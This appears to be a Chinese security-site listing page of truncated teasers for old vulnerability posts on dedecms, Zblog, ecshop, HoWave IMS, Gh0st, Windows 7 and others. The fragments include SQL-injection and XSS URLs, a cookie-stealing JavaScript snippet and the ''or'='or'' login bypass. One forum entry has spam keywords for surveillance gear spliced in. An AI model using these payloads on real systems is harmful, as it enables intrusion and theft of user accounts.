小编 cyask知道系统collect.php页面存在越权漏洞
影响版本: Cyask 程序介绍: Cyask国内较为多人使用的仿百度风格的Ask系统。 漏洞分析: 从Collect.php代码当中可以看到 else { /* 检查网址 */ $url=get_referer(); $neturl=emptyemp...
也想出现在这里?
联系我们吧
ecshop爆绝对路径的bug
ecshop爆绝对路径的bug 网址如下" http://www.zzfhw.com/ECShop/includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/se...
Zblog最新跨站漏洞及利用代码
Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向 xmlhttp=poster(); cookie=document.cookie; login=cookie.indexOf(‘password&rsq...
恒浪IMS整合系统V4.1 多文件存在SQL注入漏洞
影响版本:HoWave V4.1 ASP漏洞描述:在文件inc/ hl_manage.inc中: adminUserId= Request.Cookies("hl_manage")("username") //第...
dedecms织梦 v5.5 两处跨站漏洞
影响版本: dedecms织梦5.5 漏洞描述: demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&...
xyxcms v1.3 小游戏CMS 漏洞说明
国内最专业的ASP网站内容管理系统-小游戏管理系统,他将是您轻松建站的首选利器。小游戏CMS系统对站点管理和创造编辑都有好处,无论是CMS系统的易用性和功能的完善性,都处于领先优势!网站的编辑、发布、管理人员可轻松便捷的通过小游戏CMS系统来提交修改、...
WINDOWS 7 RC 7100 GDI驱动Win32k.sys内核D.O.S漏洞
感谢:Iceboy发现此问题并提供DUMP漏洞厂商及产品:Microsoft Windows 7 rc 7100 090421存在漏洞组件:win32k.sys Timestamp :49ee8dc8存在漏洞函数:NtUserGetDc/NtUserG...
dedecms 5.6的最新注入漏洞
最新dedecms 5.6的注入代码: http://www.dedecms.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2%29%29%20AND%20%22%27%22%20AND%20upd...
Discuz X1.5 用不到 Gmail SSL SMTP
前天16:50 上传 下载附件 (34.22 KB) ,窃听器哪里有卖 设置如上,车辆跟踪器,登入 username 及 password 都再三确认 但用「检测」就弹出以下错误 前天16:50 上传 下载附件 (12.73 KB) 请问是甚么地方出错
Gh0st控制端逻辑漏洞
严重程度:高威胁程度:控制远程主机错误类型:逻辑错误利用方式:主机模式 受影响系统Gh0st3.6之前所有版本 未影响系统 未知 详细描述Gh0st 发现漏洞一个逻辑漏洞,这些漏洞可以被用户利用,可以从被控端向控制端发送任意文件到任意位置。 测试代码1...
EXCMS 0day (过程精彩)
以下版本没测试 测试的是最新版本 在公布前几小时没有通知官方 ^_^ 哈哈 为什么说过程精彩呢? 看完就明白! 因为这个漏洞原因非一般! 同时映射出中国软件行业的悲哀!!! 经典对白 看代码 后台登录文件 adminModu...
万能密码漏洞以及修复
万能密码漏洞以及修复 记得几年前要入侵一个企业网站超级简单 一般只需要找到后台 还有后台通常是www.xxx.com/admin/ 然后账号 密码都是\’or\’=\’or\’ 就进去 ...
